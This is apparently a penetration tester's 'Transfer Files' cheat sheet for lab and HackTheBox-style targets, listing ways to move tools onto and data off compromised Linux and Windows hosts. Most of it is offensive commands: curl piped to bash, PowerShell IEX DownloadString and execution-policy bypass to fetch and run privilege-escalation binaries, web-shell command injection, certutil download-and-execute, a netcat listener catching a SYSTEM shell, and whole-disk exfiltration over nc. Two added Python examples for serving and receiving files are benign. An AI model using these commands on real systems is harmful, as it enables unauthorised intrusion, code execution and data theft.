Transfer Files


Last updated 2 years ago


More

Curl

vim script.py
python -m SimpleHTTPServer 80                     ..share
curl http://10.x.x.x:80/script.py -o /opt/tmp.py  ..d/l overwrite
curl $MyIP:80/LinEnum.sh | bash                   ..d/l execute (linux)

curl --user david:Nowonly4me http://10.x.x.x/~david/
curl --user david:Nowonly4me --negotiate http://10.x.x.x/~david/

smbserver

  • Share from Linux SMB to Windows

locate smbserver.py                             ..find
cd /usr/share/doc/python3-impacket/examples     ..prep
sudo python3 ./smbserver.py share /tmp          ..share
impacket-smbserver share `pwd`                  ..another method
smbclient -L 10.x.x.x --no-pass                 ..test

net view \\10.x.x.x                             ..windows command
net use z: \\10.x.x.x\pub                       ..map a drive
copy "Oracle Issue.txt" z:                      ..copy file
dir \\10.x.x.x\share                            ..windows list directory
copy \\10.x.x.x\share\app C:\Windows\Temp\      ..windows copy
\\10.x.x.x\share\reverse.exe                    ..run

Windows Share

  • Linux: Copy to Windows Share

smbclient //10.x.x.x/sharename -U domain/username
  • Linux: Mount Windows Share

mkdir /mnt/smbshare
sudo mount -t cifs //serverfs/c$ -o username=bob,password=xyz /mnt/smbshare
cd /mnt/smbshare
  • Windows: Copy to Windows Share

copy exploit.exe \\10.x.x.x\users\bob

HTTP Server One Liners

> python2 -m SimpleHTTPServer 80
> python3 -m http.server 80

> php -S localhost:80 -t evil/

> while true; do nc -l 80 < test.html; done

> ncat -k -l -p 80 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/evil.html"

> perl -MIO::All -e 'io(":80")->fork->accept->(sub { $_[0] < io(-x $1 ? "./$1 |" : $1) if /^GET \/(.*) / })'

> ruby -run -e httpd . -p 80

From inetd.conf:
> 80 stream tcp nowait nobody cat cat /somefile
... where /somefile has the HTTP response line, headers and body
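The one-liners above and the curl lines under Curl are the two ends of one transfer. The following is an added Python example, not from these notes: it runs both ends in one process, with http.server (the module behind python3 -m http.server) serving a temporary directory on a loopback port, urllib fetching the file the way curl -o does, and a SHA-256 check that deletes a truncated or swapped download instead of leaving it to be run. The handler also keeps the access-log line each request produces, which is what the serving host sees. File names and contents are constructed for the demo.

```python
"""Serve a directory over HTTP and fetch a file back, verifying its SHA-256.

Added example, not from the original notes. Standard library only:
http.server bound to a loopback port chosen by the OS, urllib for the
download. File names and contents below are constructed for the demo.
"""
import hashlib
import http.server
import os
import shutil
import tempfile
import threading
import urllib.error
import urllib.request
from functools import partial


def sha256_of(path):
    """Hex SHA-256 of a file, read in chunks so large binaries stay out of memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


class LoggingHandler(http.server.SimpleHTTPRequestHandler):
    """SimpleHTTPRequestHandler that keeps an in-memory access log instead of printing."""
    requests = []  # (method, path, status) per request, in arrival order

    def log_request(self, code="-", size="-"):
        self.requests.append((self.command, self.path, int(code)))

    def log_message(self, format, *args):
        return None  # keep stderr quiet; log_request above records what matters


def start_server(directory):
    """Serve `directory` on 127.0.0.1 with an ephemeral port; return (server, port)."""
    handler = partial(LoggingHandler, directory=directory)
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def download(url, dest, expected_sha256):
    """Fetch `url` to `dest`, overwriting like curl -o. Return True only when the
    download completed and its SHA-256 matches; a mismatching copy is removed so
    a bad file is never left behind to be executed."""
    try:
        with urllib.request.urlopen(url, timeout=5) as resp, open(dest, "wb") as out:
            shutil.copyfileobj(resp, out)
    except urllib.error.URLError:  # covers HTTPError (404 etc.) and connection errors
        return False
    if sha256_of(dest) != expected_sha256:
        os.remove(dest)
        return False
    return True


def demo():
    """Round-trip a constructed file through the server and report what happened."""
    LoggingHandler.requests.clear()
    share = tempfile.mkdtemp(prefix="share-")   # directory the server exposes
    inbox = tempfile.mkdtemp(prefix="inbox-")   # where the client saves downloads
    src = os.path.join(share, "LinEnum.sh")     # constructed sample, not the real script
    with open(src, "wb") as f:
        f.write(b"#!/bin/bash\necho demo\n" * 1000)
    expected = sha256_of(src)

    server, port = start_server(share)
    base = f"http://127.0.0.1:{port}/"
    try:
        ok = download(base + "LinEnum.sh", os.path.join(inbox, "tmp.sh"), expected)
        missing = download(base + "nope.sh", os.path.join(inbox, "nope.sh"), expected)
        tampered = download(base + "LinEnum.sh", os.path.join(inbox, "bad.sh"), "0" * 64)
        leftover = os.path.exists(os.path.join(inbox, "bad.sh"))
        log = list(LoggingHandler.requests)
    finally:
        server.shutdown()
        server.server_close()
        shutil.rmtree(share)
        shutil.rmtree(inbox)
    return {"ok": ok, "missing": missing, "tampered": tampered,
            "leftover_bad_copy": leftover, "log": log}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it directly to see the three requests the server logged (two 200s and a 404); the same GET lines are what a real python3 -m http.server prints to its terminal, so they are also what an admin would find if such a server were left running on a host.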

Powershell

  • Share with Linux: python3 -m http.server

  • Download with Windows PowerShell

----------------------
powershell.exe "(New-Object System.Net.WebClient).Downloadfile('http://$MyIP:8000/myfile','myfile')"

----------------------
echo IEX(New-Object Net.WebClient).DownloadString('http://<ip>:<port>/Sherlock.ps1') | powershell -noprofile

----------------------
echo $WebClient = New-Object System.Net.WebClient > wget.ps1
echo $WebClient.DownloadFile($Args[0],$Args[1]) >>  wget.ps1
powershell -ExecutionPolicy Bypass -File wget.ps1 http://$MyIP:8000/file.exe file.exe

----------------------
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString('http://10.x.x.x:8000/PowerUp.ps1')|powershell -noprofile

Powershell Advanced

  • Can't execute the payload?

  • Powershell ByPass Execution Policy

cd C:\ColdFusion8\  or:
cd C:\Windows\Temp

echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Chimichurri.exe 10.10.14.x 5555
nc -nvlp 5555
connected ..system!!

smb setup issues

  • Run smbserver.py from Linux

  • Now Windows can share back to Linux

------------------------
Install Attempts:

python --version
python3 --version
apt-get install python3.6-dev libmysqlclient-dev
pip install --upgrade setuptools --user python
sudo apt-get install libpcap-dev libpq-dev
pip3 install --upgrade setuptools --user python
cd /opt/impacket
sudo -i
git clone https://github.com/SecureAuthCorp/impacket.git
pip install .
pip3 install .
python3 -m pip install -U pip
python3 -m pip install -U setuptools
pip install impacket
pip3 install impacket

smb setup impacket python2

Install the old pip (unofficial way)
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py

PATH=/home/kali/.local/bin:$PATH     ..update PATH manually

pip --version                        ..confirm v2 not v3
pip 20.3.4 from /home/kali/.local/lib/python2.7/site-packages/pip (python 2.7)

pip install --upgrade setuptools
pip install impacket

smb optional

> impacket-smbserver share ./myfolder
http://10.x.x.x/ippsec.php?fexec=\\10.x.x.x\share\privesc.exe whoami

nc

Easy:

nc -lp 4444 > out.file
nc -w 3 DestIP 4444 < out.file


Faster:

nc -lp 4444 | uncompress -c | tar xvfp -
tar cfp - /some/dir | compress -c | nc -w 3 DestIP 4444


Whole Hard Drive:

dd if=/dev/hda3 | gzip -9 | nc -l 3333
nc DestIP 3333 | pv -b > hdImage.img.gz
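The Faster pipeline above streams a tar archive straight through the socket with no file staged on either side. As an added example, not from these notes, here is the same exchange in Python's standard library so both ends can be exercised on loopback: the sender writes a gzip tar into the socket (tar cf - | gzip | nc) and the receiver unpacks the stream as bytes arrive (nc -l | gunzip | tar x), skipping any archive entry whose path would land outside the destination directory. The directory contents and the ephemeral port are constructed for the demo.

```python
"""Stream a directory as a gzip-compressed tar over a TCP socket and unpack it.

Added example, not from the original notes. Standard library only; the
directory tree below is constructed for the demo.
"""
import os
import socket
import tarfile
import tempfile
import threading

# Use tarfile's extraction filter where available (3.12+, backported to
# 3.8.17/3.9.17/3.10.12/3.11.4) so absolute and ../ member paths are rejected.
_EXTRACT_KW = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}


def send_dir(directory, host, port, arcname="backup"):
    """Connect to host:port and stream `directory` as tar.gz (tar cf - dir | gzip | nc)."""
    with socket.create_connection((host, port), timeout=10) as sock:
        raw = sock.makefile("wb")
        with tarfile.open(fileobj=raw, mode="w|gz") as tar:
            tar.add(directory, arcname=arcname)
        raw.close()  # flush buffered bytes; closing the socket then signals EOF


def receive_dir(listener, dest):
    """Accept one connection and unpack the tar.gz stream into `dest`
    (nc -l | gunzip | tar x). Returns the member names extracted, in archive order."""
    conn, _ = listener.accept()
    names = []
    dest_real = os.path.realpath(dest)
    with conn:
        raw = conn.makefile("rb")
        with tarfile.open(fileobj=raw, mode="r|gz") as tar:
            for member in tar:
                # Belt and braces for older Pythons: never write outside dest.
                target = os.path.realpath(os.path.join(dest, member.name))
                if not target.startswith(dest_real + os.sep):
                    continue
                tar.extract(member, path=dest, **_EXTRACT_KW)
                names.append(member.name)
        raw.close()
    return names


def demo():
    """Send a constructed tree over loopback and check it arrived intact."""
    src = tempfile.mkdtemp(prefix="src-")
    dest = tempfile.mkdtemp(prefix="dest-")
    os.mkdir(os.path.join(src, "sub"))
    with open(os.path.join(src, "a.txt"), "w") as f:
        f.write("alpha\n")
    with open(os.path.join(src, "sub", "b.txt"), "w") as f:
        f.write("bravo\n" * 500)

    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))   # ephemeral port stands in for 4444
    listener.listen(1)
    port = listener.getsockname()[1]

    result = {}
    receiver = threading.Thread(
        target=lambda: result.update(names=receive_dir(listener, dest)))
    receiver.start()
    send_dir(src, "127.0.0.1", port)
    receiver.join(timeout=10)
    listener.close()

    with open(os.path.join(dest, "backup", "sub", "b.txt")) as f:
        b_intact = f.read() == "bravo\n" * 500
    return {"names": result.get("names"), "b_intact": b_intact}


if __name__ == "__main__":
    print(demo())
```

The receiver-side path check is the part the shell pipeline lacks: a plain tar x will happily follow ../ entries from whoever is on the other end of the socket, so an unpack step that takes input from the network should always confine members to the destination directory.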

updog

  • Looks like an interesting option if you need SSL

  • Default port 9090

updog
updog -p 4444 --ssl
updog -d /tmp --password mypax

ftp

  • anonymous, writable, port 2121

linux:
pip install pyftpdlib
python -m pyftpdlib -w
python3 -m pyftpdlib -p 21 -u mike -P paxx
 
windows:
ftp
open $MyIP
user mike passwurd
passive
put localfilename remotefilename
bye

ftp -n < ftpcommands.txt   ..optional

Permission Trouble

  • You may have a permissions problem

  • Save and execute from the Temp folder!

cd C:\Windows\Temp\
copy \\10.x.x.x\share\myapp.exe .
myapp.exe

certutil

  • You can download files on Windows with this tool

  • REF: bountyHTB

rs.Exec("certutil -urlcache -split -f http://10.x.x.x/agent.exe C:\\users\\public\\agent.exe")
rs.Exec("cmd /c C:\users\public\agent.exe")   ..execute
http://10.x.x.x/UploadedFiles/web.config      ..execute

REF:

https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/
https://gist.github.com/willurd/5720255
PowershellCheatsheet
https://blog.ropnop.com/transferring-files-from-kali-to-windows/
https://github.com/SecureAuthCorp/impacket
https://github.com/sc0tfree/updog
https://pythonhosted.org/pyftpdlib/faqs.html
DrupalPhpVuln
ChimichurriWindowsPrivEsc
ChurrascoWindowsPrivEsc